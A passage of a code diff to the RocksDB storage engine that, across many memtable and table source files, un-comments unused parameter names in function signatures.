+ const SliceTransform* transform, Logger* logger) { return new SkipListRep(compare, allocator, transform, lookahead_); } diff --git a/memtable/vectorrep.cc b/memtable/vectorrep.cc index 378b29624af..e54025c2d3d 100644 --- a/memtable/vectorrep.cc +++ b/memtable/vectorrep.cc @@ -227,8 +227,8 @@ void VectorRep::Iterator::Seek(const Slice& user_key, } // Advance to the first entry with a key <= target -void VectorRep::Iterator::SeekForPrev(const Slice& /*user_key*/, - const char* /*memtable_key*/) { +void VectorRep::Iterator::SeekForPrev(const Slice& user_key, + const char* memtable_key) { assert(false); } @@ -296,7 +296,7 @@ MemTableRep::Iterator* VectorRep::GetIterator(Arena* arena) { MemTableRep* VectorRepFactory::CreateMemTableRep( const MemTableRep::KeyComparator& compare, Allocator* allocator, - const SliceTransform*, Logger* /*logger*/) { + const SliceTransform*, Logger* logger) { return new VectorRep(compare, allocator, count_); } } // namespace rocksdb diff --git a/options/options_helper.cc b/options/options_helper.cc index 82c734cba99..9e984f6e39e 100644 --- a/options/options_helper.cc +++ b/options/options_helper.cc @@ -1129,7 +1129,7 @@ Status GetPlainTableOptionsFromMap( const PlainTableOptions& table_options, const std::unordered_map& opts_map, PlainTableOptions* new_table_options, bool input_strings_escaped, - bool /*ignore_unknown_options*/) { + bool ignore_unknown_options) { assert(new_table_options); *new_table_options = table_options; for (const auto& o : opts_map) { diff --git a/options/options_parser.cc b/options/options_parser.cc index fc4e119f3db..d5a3fec6ef0 100644 --- a/options/options_parser.cc +++ b/options/options_parser.cc @@ -689,7 +689,7 @@ Status RocksDBOptionsParser::VerifyRocksDBOptionsFromFile( Status RocksDBOptionsParser::VerifyDBOptions( const DBOptions& base_opt, const DBOptions& persisted_opt, - const std::unordered_map* /*opt_map*/, + const std::unordered_map* opt_map, OptionsSanityCheckLevel sanity_check_level) { for (auto pair : db_options_type_info) { if (pair.second.verification == OptionVerificationType::kDeprecated) { diff --git a/port/port_posix.cc b/port/port_posix.cc index e3af7726024..59241daff44 100644 --- a/port/port_posix.cc +++ b/port/port_posix.cc @@ -35,7 +35,7 @@ static int PthreadCall(const char* label, int result) { return result; } -Mutex::Mutex(bool /*adaptive*/) { +Mutex::Mutex(bool adaptive) { #ifdef ROCKSDB_PTHREAD_ADAPTIVE_MUTEX if (!adaptive) { PthreadCall("init mutex", pthread_mutex_init(&mu_, nullptr)); diff --git a/port/stack_trace.cc b/port/stack_trace.cc index 6f657be51b2..baaf140142d 100644 --- a/port/stack_trace.cc +++ b/port/stack_trace.cc @@ -13,7 +13,7 @@ namespace rocksdb { namespace port { void InstallStackTraceHandler() {} -void PrintStack(int /*first_frames_to_skip*/) {} +void PrintStack(int first_frames_to_skip) {} } // namespace port } // namespace rocksdb diff --git a/table/adaptive_table_factory.cc b/table/adaptive_table_factory.cc index 173bca71c1b..f83905dff3a 100644 --- a/table/adaptive_table_factory.cc +++ b/table/adaptive_table_factory.cc @@ -44,7 +44,7 @@ Status AdaptiveTableFactory::NewTableReader( const TableReaderOptions& table_reader_options, unique_ptr&& file, uint64_t file_size, unique_ptr* table, - bool /*prefetch_index_and_filter_in_cache*/) const { + bool prefetch_index_and_filter_in_cache) const { Footer footer; auto s = ReadFooterFromFile(file.get(), file_size, &footer); if (!s.ok()) { diff --git a/table/adaptive_table_factory.h b/table/adaptive_table_factory.h index 00af6a76e95..b7b52ba96fc 100644 --- a/table/adaptive_table_factory.h +++ b/table/adaptive_table_factory.h @@ -44,9 +44,8 @@ class AdaptiveTableFactory : public TableFactory { uint32_t column_family_id, WritableFileWriter* file) const override; // Sanitizes the specified DB Options. - Status SanitizeOptions( - const DBOptions& /*db_opts*/, - const ColumnFamilyOptions& /*cf_opts*/) const override { + Status SanitizeOptions(const DBOptions& db_opts, + const ColumnFamilyOptions& cf_opts) const override { return Status::OK(); } diff --git a/table/block_based_filter_block.cc b/table/block_based_filter_block.cc index a09f1a0e0af..697c11a42f0 100644 --- a/table/block_based_filter_block.cc +++ b/table/block_based_filter_block.cc @@ -113,7 +113,7 @@ inline void BlockBasedFilterBlockBuilder::AddPrefix(const Slice& key) { } } -Slice BlockBasedFilterBlockBuilder::Finish(const BlockHandle& /*tmp*/, +Slice BlockBasedFilterBlockBuilder::Finish(const BlockHandle& tmp, Status* status) { // In this impl we ignore BlockHandle *status = Status::OK(); @@ -185,8 +185,8 @@ BlockBasedFilterBlockReader::BlockBasedFilterBlockReader( } bool BlockBasedFilterBlockReader::KeyMayMatch( - const Slice& key, uint64_t block_offset, const bool /*no_io*/, - const Slice* const /*const_ikey_ptr*/) { + const Slice& key, uint64_t block_offset, const bool no_io, + const Slice* const const_ikey_ptr) { assert(block_offset != kNotValid); if (!whole_key_filtering_) { return true; @@ -195,8 +195,8 @@ bool BlockBasedFilterBlockReader::KeyMayMatch( } bool BlockBasedFilterBlockReader::PrefixMayMatch( - const Slice& prefix, uint64_t block_offset, const bool /*no_io*/, - const Slice* const /*const_ikey_ptr*/) { + const Slice& prefix, uint64_t block_offset, const bool no_io, + const Slice* const const_ikey_ptr) { assert(block_offset != kNotValid); if (!prefix_extractor_) { return true; diff --git a/table/block_based_table_builder.cc b/table/block_based_table_builder.cc index 594fd92fce1..e87def73e7e 100644 --- a/table/block_based_table_builder.cc +++ b/table/block_based_table_builder.cc @@ -209,8 +209,8 @@ class BlockBasedTableBuilder::BlockBasedTablePropertiesCollector whole_key_filtering_(whole_key_filtering), prefix_filtering_(prefix_filtering) {} - virtual Status InternalAdd(const Slice& /*key*/, const Slice& /*value*/, - uint64_t /*file_size*/) override { + virtual Status InternalAdd(const Slice& key, const Slice& value, + uint64_t file_size) override { // Intentionally left blank. Have no interest in collecting stats for // individual key/value pairs. return Status::OK(); @@ -585,7 +585,7 @@ Status BlockBasedTableBuilder::status() const { return rep_->status; } -static void DeleteCachedBlock(const Slice& /*key*/, void* value) { +static void DeleteCachedBlock(const Slice& key, void* value) { Block* block = reinterpret_cast(value); delete block; } diff --git a/table/block_based_table_factory.cc b/table/block_based_table_factory.cc index 3620db1416e..4705046bfeb 100644 --- a/table/block_based_table_factory.cc +++ b/table/block_based_table_factory.cc @@ -82,7 +82,8 @@ TableBuilder* BlockBasedTableFactory::NewTableBuilder( } Status BlockBasedTableFactory::SanitizeOptions( - const DBOptions& /*db_opts*/, const ColumnFamilyOptions& cf_opts) const { + const DBOptions& db_opts, + const ColumnFamilyOptions& cf_opts) const { if (table_options_.index_type == BlockBasedTableOptions::kHashSearch && cf_opts.prefix_extractor == nullptr) { return Status::InvalidArgument("Hash index is specified for block-based " diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index 5ac1300789c..123e1814ab7 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -91,13 +91,13 @@ Status ReadBlockFromFile(RandomAccessFileReader* file, const Footer& footer, // Delete the resource that is held by the iterator. template -void DeleteHeldResource(void* arg, void* /*ignored*/) { +void DeleteHeldResource(void* arg, void* ignored) { delete reinterpret_cast(arg); } // Delete the entry resided in the cache. template -void DeleteCachedEntry(const Slice& /*key*/, void* value) { +void DeleteCachedEntry(const Slice& key, void* value) { auto entry = reinterpret_cast(value); delete entry; } @@ -179,8 +179,8 @@ class PartitionIndexReader : public IndexReader, public Cleanable { } // return a two-level iterator: first level is on the partition index - virtual InternalIterator* NewIterator(BlockIter* /*iter*/ = nullptr, - bool /*dont_care*/ = true) override { + virtual InternalIterator* NewIterator(BlockIter* iter = nullptr, + bool dont_care = true) override { // Filters are already checked before seeking the index const bool skip_filters = true; const bool is_index = true; @@ -259,7 +259,7 @@ class BinarySearchIndexReader : public IndexReader { } virtual InternalIterator* NewIterator(BlockIter* iter = nullptr, - bool /*dont_care*/ = true) override { + bool dont_care = true) override { return index_block_->NewIterator(icomparator_, iter, true); } @@ -294,7 +294,7 @@ class HashIndexReader : public IndexReader { const BlockHandle& index_handle, InternalIterator* meta_index_iter, IndexReader** index_reader, - bool /*hash_index_allow_collision*/, + bool hash_index_allow_collision, const PersistentCacheOptions& cache_options) { std::unique_ptr index_block; auto s = ReadBlockFromFile( @@ -941,7 +941,7 @@ Status BlockBasedTable::GetDataBlockFromCache( Status BlockBasedTable::PutDataBlockToCache( const Slice& block_cache_key, const Slice& compressed_block_cache_key, Cache* block_cache, Cache* block_cache_compressed, - const ReadOptions& /*read_options*/, const ImmutableCFOptions& ioptions, + const ReadOptions& read_options, const ImmutableCFOptions& ioptions, CachableEntry* block, Block* raw_block, uint32_t format_version, const Slice& compression_dict, size_t read_amp_bytes_per_bit, bool is_index, Cache::Priority priority) { @@ -2257,7 +2257,7 @@ void BlockBasedTable::DumpKeyValue(const Slice& key, const Slice& value, namespace { -void DeleteCachedFilterEntry(const Slice& /*key*/, void* value) { +void DeleteCachedFilterEntry(const Slice& key, void* value) { FilterBlockReader* filter = reinterpret_cast(value); if (filter->statistics() != nullptr) { RecordTick(filter->statistics(), BLOCK_CACHE_FILTER_BYTES_EVICT, @@ -2266,7 +2266,7 @@ void DeleteCachedFilterEntry(const Slice& /*key*/, void* value) { delete filter; } -void DeleteCachedIndexEntry(const Slice& /*key*/, void* value) { +void DeleteCachedIndexEntry(const Slice& key, void* value) { IndexReader* index_reader = reinterpret_cast(value); if (index_reader->statistics() != nullptr) { RecordTick(index_reader->statistics(), BLOCK_CACHE_INDEX_BYTES_EVICT, diff --git a/table/block_test.cc b/table/block_test.cc index 0258be4866c..f5c543975f4 100644 --- a/table/block_test.cc +++ b/table/block_test.cc @@ -133,7 +133,7 @@ TEST_F(BlockTest, SimpleTest) { BlockContents GetBlockContents(std::unique_ptr *builder, const std::vector &keys, const std::vector &values, - const int /*prefix_group_size*/ = 1) { + const int prefix_group_size = 1) { builder->reset(new BlockBuilder(1 /* restart interval */)); // Add only half of the keys diff --git a/table/cuckoo_table_builder_test.cc b/table/cuckoo_table_builder_test.cc index dfd80c22a5a..ec282b4b540 100644 --- a/table/cuckoo_table_builder_test.cc +++ b/table/cuckoo_table_builder_test.cc @@ -23,7 +23,7 @@ namespace { std::unordered_map> hash_map; uint64_t GetSliceHash(const Slice& s, uint32_t index, - uint64_t /*max_num_buckets*/) { + uint64_t max_num_buckets) { return hash_map[s.ToString()][index]; } } // namespace diff --git a/table/cuckoo_table_factory.cc b/table/cuckoo_table_factory.cc index 84d22468eb9..2325bcf77c4 100644 --- a/table/cuckoo_table_factory.cc +++ b/table/cuckoo_table_factory.cc @@ -16,7 +16,7 @@ Status CuckooTableFactory::NewTableReader( const TableReaderOptions& table_reader_options, unique_ptr&& file, uint64_t file_size, std::unique_ptr* table, - bool /*prefetch_index_and_filter_in_cache*/) const { + bool prefetch_index_and_filter_in_cache) const { std::unique_ptr new_reader(new CuckooTableReader( table_reader_options.ioptions, std::move(file), file_size, table_reader_options.internal_comparator.user_comparator(), nullptr)); diff --git a/table/cuckoo_table_factory.h b/table/cuckoo_table_factory.h index e3371563fb5..774dc3c3e80 100644 --- a/table/cuckoo_table_factory.h +++ b/table/cuckoo_table_factory.h @@ -67,9 +67,8 @@ class CuckooTableFactory : public TableFactory { uint32_t column_family_id, WritableFileWriter* file) const override; // Sanitizes the specified DB Options. - Status SanitizeOptions( - const DBOptions& /*db_opts*/, - const ColumnFamilyOptions& /*cf_opts*/) const override { + Status SanitizeOptions(const DBOptions& db_opts, + const ColumnFamilyOptions& cf_opts) const override { return Status::OK(); } diff --git a/table/cuckoo_table_reader.cc b/table/cuckoo_table_reader.cc index 47d58753c0a..85670ad1daf 100644 --- a/table/cuckoo_table_reader.cc +++ b/table/cuckoo_table_reader.cc @@ -127,9 +127,8 @@ CuckooTableReader::CuckooTableReader( status_ = file_->Read(0, file_size, &file_data_, nullptr); } -Status CuckooTableReader::Get(const ReadOptions& /*readOptions*/, - const Slice& key, GetContext* get_context, - bool /*skip_filters*/) { +Status CuckooTableReader::Get(const ReadOptions& readOptions, const Slice& key, + GetContext* get_context, bool skip_filters) { assert(key.size() == key_length_ + (is_last_level_ ? 8 : 0)); Slice user_key = ExtractUserKey(key); for (uint32_t hash_cnt = 0; hash_cnt < num_hash_func_; ++hash_cnt) { @@ -300,7 +299,7 @@ void CuckooTableIterator::Seek(const Slice& target) { PrepareKVAtCurrIdx(); } -void CuckooTableIterator::SeekForPrev(const Slice& /*target*/) { +void CuckooTableIterator::SeekForPrev(const Slice& target) { // Not supported assert(false); } @@ -365,8 +364,8 @@ extern InternalIterator* NewErrorInternalIterator(const Status& status, Arena* arena); InternalIterator* CuckooTableReader::NewIterator( - const ReadOptions& /*read_options*/, Arena* arena, - const InternalKeyComparator* /*icomp*/, bool /*skip_filters*/) { + const ReadOptions& read_options, Arena* arena, + const InternalKeyComparator* icomp, bool skip_filters) { if (!status().ok()) { return NewErrorInternalIterator( Status::Corruption("CuckooTableReader status is not okay."), arena); diff --git a/table/cuckoo_table_reader.h b/table/cuckoo_table_reader.h index fdb18beb939..f2b6d1a9cfe 100644 --- a/table/cuckoo_table_reader.h +++ b/table/cuckoo_table_reader.h @@ -55,7 +55,7 @@ class CuckooTableReader: public TableReader { size_t ApproximateMemoryUsage() const override; // Following methods are not implemented for Cuckoo Table Reader - uint64_t ApproximateOffsetOf(const Slice& /*key*/) override { return 0; } + uint64_t ApproximateOffsetOf(const Slice& key) override { return 0; } void SetupForCompaction() override {} // End of methods not implemented. diff --git a/table/cuckoo_table_reader_test.cc b/table/cuckoo_table_reader_test.cc index a012bceeb7a..7e131e56e31 100644 --- a/table/cuckoo_table_reader_test.cc +++ b/table/cuckoo_table_reader_test.cc @@ -61,7 +61,7 @@ void AddHashLookups(const std::string& s, uint64_t bucket_id, } uint64_t GetSliceHash(const Slice& s, uint32_t index, - uint64_t /*max_num_buckets*/) { + uint64_t max_num_buckets) { return hash_map[s.ToString()][index]; } } // namespace diff --git a/table/full_filter_block.cc b/table/full_filter_block.cc index 448b827847b..5739494e8dd 100644 --- a/table/full_filter_block.cc +++ b/table/full_filter_block.cc @@ -43,8 +43,7 @@ inline void FullFilterBlockBuilder::AddPrefix(const Slice& key) { AddKey(prefix); } -Slice FullFilterBlockBuilder::Finish(const BlockHandle& /*tmp*/, - Status* status) { +Slice FullFilterBlockBuilder::Finish(const BlockHandle& tmp, Status* status) { // In this impl we ignore BlockHandle *status = Status::OK(); if (num_added_ != 0) { @@ -75,8 +74,8 @@ FullFilterBlockReader::FullFilterBlockReader( } bool FullFilterBlockReader::KeyMayMatch(const Slice& key, uint64_t block_offset, - const bool /*no_io*/, - const Slice* const /*const_ikey_ptr*/) { + const bool no_io, + const Slice* const const_ikey_ptr) { assert(block_offset == kNotValid); if (!whole_key_filtering_) { return true; @@ -84,9 +83,10 @@ bool FullFilterBlockReader::KeyMayMatch(const Slice& key, uint64_t block_offset, return MayMatch(key); } -bool FullFilterBlockReader::PrefixMayMatch( - const Slice& prefix, uint64_t block_offset, const bool /*no_io*/, - const Slice* const /*const_ikey_ptr*/) { +bool FullFilterBlockReader::PrefixMayMatch(const Slice& prefix, + uint64_t block_offset, + const bool no_io, + const Slice* const const_ikey_ptr) { assert(block_offset == kNotValid); if (!prefix_extractor_) { return true; diff --git a/table/full_filter_block.h b/table/full_filter_block.h index e161d079e54..be27c58b61d 100644 --- a/table/full_filter_block.h +++ b/table/full_filter_block.h @@ -43,7 +43,7 @@ class FullFilterBlockBuilder : public FilterBlockBuilder { ~FullFilterBlockBuilder() {} virtual bool IsBlockBased() override { return false; } - virtual void StartBlock(uint64_t /*block_offset*/) override {} + virtual void StartBlock(uint64_t block_offset) override {} virtual void Add(const Slice& key) override; virtual Slice Finish(const BlockHandle& tmp, Status* status) override; using FilterBlockBuilder::Finish; diff --git a/table/get_context.cc b/table/get_context.cc index aacf5d5bdf4..0d688fe4609 100644 --- a/table/get_context.cc +++ b/table/get_context.cc @@ -73,7 +73,7 @@ void GetContext::MarkKeyMayExist() { } } -void GetContext::SaveValue(const Slice& value, SequenceNumber /*seq*/) { +void GetContext::SaveValue(const Slice& value, SequenceNumber seq) { assert(state_ == kNotFound); appendToReplayLog(replay_log_, kTypeValue, value); diff --git a/table/index_builder.h b/table/index_builder.h index 3793cebc258..d591e0e533c 100644 --- a/table/index_builder.h +++ b/table/index_builder.h @@ -69,7 +69,7 @@ class IndexBuilder { // This method will be called whenever a key is added. The subclasses may // override OnKeyAdded() if they need to collect additional information. - virtual void OnKeyAdded(const Slice& /*key*/) {} + virtual void OnKeyAdded(const Slice& key) {} // Inform the index builder that all entries has been written. Block builder // may therefore perform any operation required for block finalization. @@ -137,7 +137,7 @@ class ShortenedIndexBuilder : public IndexBuilder { using IndexBuilder::Finish; virtual Status Finish( IndexBlocks* index_blocks, - const BlockHandle& /*last_partition_block_handle*/) override { + const BlockHandle& last_partition_block_handle) override { index_blocks->index_block_contents = index_block_builder_.Finish(); return Status::OK(); } diff --git a/table/internal_iterator.h b/table/internal_iterator.h index 3dc8f926580..2bfdb7d952a 100644 --- a/table/internal_iterator.h +++ b/table/internal_iterator.h @@ -74,8 +74,7 @@ class InternalIterator : public Cleanable { // but for Iterators that need to communicate with PinnedIteratorsManager // they will implement this function and use the passed pointer to communicate // with PinnedIteratorsManager. - virtual void SetPinnedItersMgr(PinnedIteratorsManager* /*pinned_iters_mgr*/) { - } + virtual void SetPinnedItersMgr(PinnedIteratorsManager* pinned_iters_mgr) {} // If true, this means that the Slice returned by key() is valid as long as // PinnedIteratorsManager::ReleasePinnedData is not called and the @@ -92,7 +91,7 @@ class InternalIterator : public Cleanable { // Iterator is not deleted. virtual bool IsValuePinned() const { return false; } - virtual Status GetProperty(std::string /*prop_name*/, std::string* /*prop*/) { + virtual Status GetProperty(std::string prop_name, std::string* prop) { return Status::NotSupported(""); } diff --git a/table/iterator.cc b/table/iterator.cc index 295bf8b9cfe..23a84b59e0f 100644 --- a/table/iterator.cc +++ b/table/iterator.cc @@ -98,8 +98,8 @@ class EmptyIterator : public Iterator { public: explicit EmptyIterator(const Status& s) : status_(s) { } virtual bool Valid() const override { return false; } - virtual void Seek(const Slice& /*target*/) override {} - virtual void SeekForPrev(const Slice& /*target*/) override {} + virtual void Seek(const Slice& target) override {} + virtual void SeekForPrev(const Slice& target) override {} virtual void SeekToFirst() override {} virtual void SeekToLast() override {} virtual void Next() override { assert(false); } @@ -122,8 +122,8 @@ class EmptyInternalIterator : public InternalIterator { public: explicit EmptyInternalIterator(const Status& s) : status_(s) {} virtual bool Valid() const override { return false; } - virtual void Seek(const Slice& /*target*/) override {} - virtual void SeekForPrev(const Slice& /*target*/) override {} + virtual void Seek(const Slice& target) override {} + virtual void SeekForPrev(const Slice& target) override {} virtual void SeekToFirst() override {} virtual void SeekToLast() override {} virtual void Next() override { assert(false); } diff --git a/table/mock_table.cc b/table/mock_table.cc index 4e8511031c4..4c9907e4599 100644 --- a/table/mock_table.cc +++ b/table/mock_table.cc @@ -27,14 +27,14 @@ stl_wrappers::KVMap MakeMockFile( } InternalIterator* MockTableReader::NewIterator(const ReadOptions&, - Arena* /*arena*/, + Arena* arena, const InternalKeyComparator*, - bool /*skip_filters*/) { + bool skip_filters) { return new MockTableIterator(table_); } Status MockTableReader::Get(const ReadOptions&, const Slice& key, - GetContext* get_context, bool /*skip_filters*/) { + GetContext* get_context, bool skip_filters) { std::unique_ptr iter(new MockTableIterator(table_)); for (iter->Seek(key); iter->Valid(); iter->Next()) { ParsedInternalKey parsed_key; @@ -57,10 +57,10 @@ std::shared_ptr MockTableReader::GetTableProperties() MockTableFactory::MockTableFactory() : next_id_(1) {} Status MockTableFactory::NewTableReader( - const TableReaderOptions& /*table_reader_options*/, - unique_ptr&& file, uint64_t /*file_size*/, + const TableReaderOptions& table_reader_options, + unique_ptr&& file, uint64_t file_size, unique_ptr* table_reader, - bool /*prefetch_index_and_filter_in_cache*/) const { + bool prefetch_index_and_filter_in_cache) const { uint32_t id = GetIDFromFile(file.get()); MutexLock lock_guard(&file_system_.mutex); @@ -76,8 +76,8 @@ Status MockTableFactory::NewTableReader( } TableBuilder* MockTableFactory::NewTableBuilder( - const TableBuilderOptions& /*table_builder_options*/, - uint32_t /*column_family_id*/, WritableFileWriter* file) const { + const TableBuilderOptions& table_builder_options, uint32_t column_family_id, + WritableFileWriter* file) const { uint32_t id = GetAndWriteNextID(file); return new MockTableBuilder(id, &file_system_); diff --git a/table/mock_table.h b/table/mock_table.h index eca85d1b26c..9e5396341c5 100644 --- a/table/mock_table.h +++ b/table/mock_table.h @@ -46,7 +46,7 @@ class MockTableReader : public TableReader { Status Get(const ReadOptions&, const Slice& key, GetContext* get_context, bool skip_filters = false) override; - uint64_t ApproximateOffsetOf(const Slice& /*key*/) override { return 0; } + uint64_t ApproximateOffsetOf(const Slice& key) override { return 0; } virtual size_t ApproximateMemoryUsage() const override { return 0; } @@ -169,8 +169,8 @@ class MockTableFactory : public TableFactory { stl_wrappers::KVMap file_contents); virtual Status SanitizeOptions( - const DBOptions& /*db_opts*/, - const ColumnFamilyOptions& /*cf_opts*/) const override { + const DBOptions& db_opts, + const ColumnFamilyOptions& cf_opts) const override { return Status::OK(); } diff --git a/table/partitioned_filter_block.cc b/table/partitioned_filter_block.cc index 6a491ad9f06..2b330039e50 100644 --- a/table/partitioned_filter_block.cc +++ b/table/partitioned_filter_block.cc @@ -87,7 +87,7 @@ Slice PartitionedFilterBlockBuilder::Finish( PartitionedFilterBlockReader::PartitionedFilterBlockReader( const SliceTransform* prefix_extractor, bool _whole_key_filtering, - BlockContents&& contents, FilterBitsReader* /*filter_bits_reader*/, + BlockContents&& contents, FilterBitsReader* filter_bits_reader, Statistics* stats, const Comparator& comparator, const BlockBasedTable* table) : FilterBlockReader(contents.data.size(), stats, _whole_key_filtering), diff --git a/table/partitioned_filter_block_test.cc b/table/partitioned_filter_block_test.cc index 86d31a4a703..a49143dae2f 100644 --- a/table/partitioned_filter_block_test.cc +++ b/table/partitioned_filter_block_test.cc @@ -25,8 +25,8 @@ class MockedBlockBasedTable : public BlockBasedTable { explicit MockedBlockBasedTable(Rep* rep) : BlockBasedTable(rep) {} virtual CachableEntry GetFilter( - const BlockHandle& filter_blk_handle, - const bool /*is_a_filter_partition*/, bool /*no_io*/) const override { + const BlockHandle& filter_blk_handle, const bool is_a_filter_partition, + bool no_io) const override { Slice slice = slices[filter_blk_handle.offset()]; auto obj = new FullFilterBlockReader( nullptr, true, BlockContents(slice, false, kNoCompression), diff --git a/table/plain_table_factory.cc b/table/plain_table_factory.cc index 7a07de731e4..eadc2c0995f 100644 --- a/table/plain_table_factory.cc +++ b/table/plain_table_factory.cc @@ -18,7 +18,7 @@ Status PlainTableFactory::NewTableReader( const TableReaderOptions& table_reader_options, unique_ptr&& file, uint64_t file_size, unique_ptr* table, - bool /*prefetch_index_and_filter_in_cache*/) const { + bool prefetch_index_and_filter_in_cache) const { return PlainTableReader::Open( table_reader_options.ioptions, table_reader_options.env_options, table_reader_options.internal_comparator, std::move(file), file_size, diff --git a/table/plain_table_factory.h b/table/plain_table_factory.h index 37c120a0fa6..33cd3134719 100644 --- a/table/plain_table_factory.h +++ b/table/plain_table_factory.h @@ -163,9 +163,8 @@ class PlainTableFactory : public TableFactory { static const char kValueTypeSeqId0 = char(0xFF); // Sanitizes the specified DB Options. - Status SanitizeOptions( - const DBOptions& /*db_opts*/, - const ColumnFamilyOptions& /*cf_opts*/) const override { + Status SanitizeOptions(const DBOptions& db_opts, + const ColumnFamilyOptions& cf_opts) const override { return Status::OK(); } diff --git a/table/plain_table_key_coding.cc b/table/plain_table_key_coding.cc index 6f5ee9b4ad2..3e87c03d13f 100644 --- a/table/plain_table_key_coding.cc +++ b/table/plain_table_key_coding.cc @@ -288,7 +288,7 @@ Status PlainTableKeyDecoder::NextPlainEncodingKey(uint32_t start_offset, ParsedInternalKey* parsed_key, Slice* internal_key, uint32_t* bytes_read, - bool* /*seekable*/) { + bool* seekable) { uint32_t user_key_size = 0; Status s; if (fixed_user_key_len_ != kPlainTableVariableLength) { diff --git a/table/plain_table_reader.cc b/table/plain_table_reader.cc index 8089dcd0798..0f9449e8669 100644 --- a/table/plain_table_reader.cc +++ b/table/plain_table_reader.cc @@ -192,7 +192,7 @@ void PlainTableReader::SetupForCompaction() { InternalIterator* PlainTableReader::NewIterator(const ReadOptions& options, Arena* arena, const InternalKeyComparator*, - bool /*skip_filters*/) { + bool skip_filters) { bool use_prefix_seek = !IsTotalOrderMode() && !options.total_order_seek; if (arena == nullptr) { return new PlainTableIterator(this, use_prefix_seek); @@ -537,8 +537,8 @@ void PlainTableReader::Prepare(const Slice& target) { } } -Status PlainTableReader::Get(const ReadOptions& /*ro*/, const Slice& target, - GetContext* get_context, bool /*skip_filters*/) { +Status PlainTableReader::Get(const ReadOptions& ro, const Slice& target, + GetContext* get_context, bool skip_filters) { // Check bloom filter first. Slice prefix_slice; uint32_t prefix_hash; @@ -602,7 +602,7 @@ Status PlainTableReader::Get(const ReadOptions& /*ro*/, const Slice& target, return Status::OK(); } -uint64_t PlainTableReader::ApproximateOffsetOf(const Slice& /*key*/) { +uint64_t PlainTableReader::ApproximateOffsetOf(const Slice& key) { return 0; } @@ -706,7 +706,7 @@ void PlainTableIterator::Seek(const Slice& target) { } } -void PlainTableIterator::SeekForPrev(const Slice& /*target*/) { +void PlainTableIterator::SeekForPrev(const Slice& target) { assert(false); status_ = Status::NotSupported("SeekForPrev() is not supported in PlainTable"); diff --git a/table/sst_file_writer_collectors.h b/table/sst_file_writer_collectors.h index 89e0970d816..ce3a45f5a74 100644 --- a/table/sst_file_writer_collectors.h +++ b/table/sst_file_writer_collectors.h @@ -26,8 +26,8 @@ class SstFileWriterPropertiesCollector : public IntTblPropCollector { SequenceNumber global_seqno) : version_(version), global_seqno_(global_seqno) {} - virtual Status InternalAdd(const Slice& /*key*/, const Slice& /*value*/, - uint64_t /*file_size*/) override { + virtual Status InternalAdd(const Slice& key, const Slice& value, + uint64_t file_size) override { // Intentionally left blank. Have no interest in collecting stats for // individual key/value pairs. return Status::OK(); @@ -68,7 +68,7 @@ class SstFileWriterPropertiesCollectorFactory : version_(version), global_seqno_(global_seqno) {} virtual IntTblPropCollector* CreateIntTblPropCollector( - uint32_t /*column_family_id*/) override { + uint32_t column_family_id) override { return new SstFileWriterPropertiesCollector(version_, global_seqno_); } diff --git a/table/table_reader.h b/table/table_reader.h index 9f137dab18d..5f47468e6de 100644 --- a/table/table_reader.h +++ b/table/table_reader.h @@ -44,7 +44,7 @@ class TableReader { bool skip_filters = false) = 0; virtual InternalIterator* NewRangeTombstoneIterator( - const ReadOptions& /*read_options*/) { + const ReadOptions& read_options) { return nullptr; } @@ -63,7 +63,7 @@ class TableReader { virtual std::shared_ptr GetTableProperties() const = 0; // Prepare work that can be done before the real Get() - virtual void Prepare(const Slice& /*target*/) {} + virtual void Prepare(const Slice& target) {} // Report an approximation of how much memory has been used. virtual size_t ApproximateMemoryUsage() const = 0; @@ -95,7 +95,7 @@ class TableReader { } // convert db file to a human readable form - virtual Status DumpTable(WritableFile* /*out_file*/) { + virtual Status DumpTable(WritableFile* out_file) { return Status::NotSupported("DumpTable() not supported"); } diff --git a/table/table_test.cc b/table/table_test.cc index a1f6a5b6e3f..c55eb425576 100644 --- a/table/table_test.cc +++ b/table/table_test.cc @@ -66,13 +66,9 @@ class DummyPropertiesCollector : public TablePropertiesCollector { public: const char* Name() const { return ""; } - Status Finish(UserCollectedProperties* /*properties*/) { - return Status::OK(); - } + Status Finish(UserCollectedProperties* properties) { return Status::OK(); } - Status Add(const Slice& /*user_key*/, const Slice& /*value*/) { - return Status::OK(); - } + Status Add(const Slice& user_key, const Slice& value) { return Status::OK(); } virtual UserCollectedProperties GetReadableProperties() const { return UserCollectedProperties{}; @@ -83,7 +79,7 @@ class DummyPropertiesCollectorFactory1 : public TablePropertiesCollectorFactory { public: virtual TablePropertiesCollector* CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context /*context*/) { + TablePropertiesCollectorFactory::Context context) { return new DummyPropertiesCollector(); } const char* Name() const { return "DummyPropertiesCollector1"; } @@ -93,7 +89,7 @@ class DummyPropertiesCollectorFactory2 : public TablePropertiesCollectorFactory { public: virtual TablePropertiesCollector* CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context /*context*/) { + TablePropertiesCollectorFactory::Context context) { return new DummyPropertiesCollector(); } const char* Name() const { return "DummyPropertiesCollector2"; } @@ -211,11 +207,11 @@ class BlockConstructor: public Constructor { ~BlockConstructor() { delete block_; } - virtual Status FinishImpl( - const Options& /*options*/, const ImmutableCFOptions& /*ioptions*/, - const BlockBasedTableOptions& table_options, - const InternalKeyComparator& /*internal_comparator*/, - const stl_wrappers::KVMap& kv_map) override { + virtual Status FinishImpl(const Options& options, + const ImmutableCFOptions& ioptions, + const BlockBasedTableOptions& table_options, + const InternalKeyComparator& internal_comparator, + const stl_wrappers::KVMap& kv_map) override { delete block_; block_ = nullptr; BlockBuilder builder(table_options.block_restart_interval); @@ -309,7 +305,7 @@ class TableConstructor: public Constructor { virtual Status FinishImpl(const Options& options, const ImmutableCFOptions& ioptions, - const BlockBasedTableOptions& /*table_options*/, + const BlockBasedTableOptions& table_options, const InternalKeyComparator& internal_comparator, const stl_wrappers::KVMap& kv_map) override { Reset(); @@ -437,11 +433,10 @@ class MemTableConstructor: public Constructor { ~MemTableConstructor() { delete memtable_->Unref(); } - virtual Status FinishImpl( - const Options&, const ImmutableCFOptions& ioptions, - const BlockBasedTableOptions& /*table_options*/, - const InternalKeyComparator& /*internal_comparator*/, - const stl_wrappers::KVMap& kv_map) override { + virtual Status FinishImpl(const Options&, const ImmutableCFOptions& ioptions, + const BlockBasedTableOptions& table_options, + const InternalKeyComparator& internal_comparator, + const stl_wrappers::KVMap& kv_map) override { delete memtable_->Unref(); ImmutableCFOptions 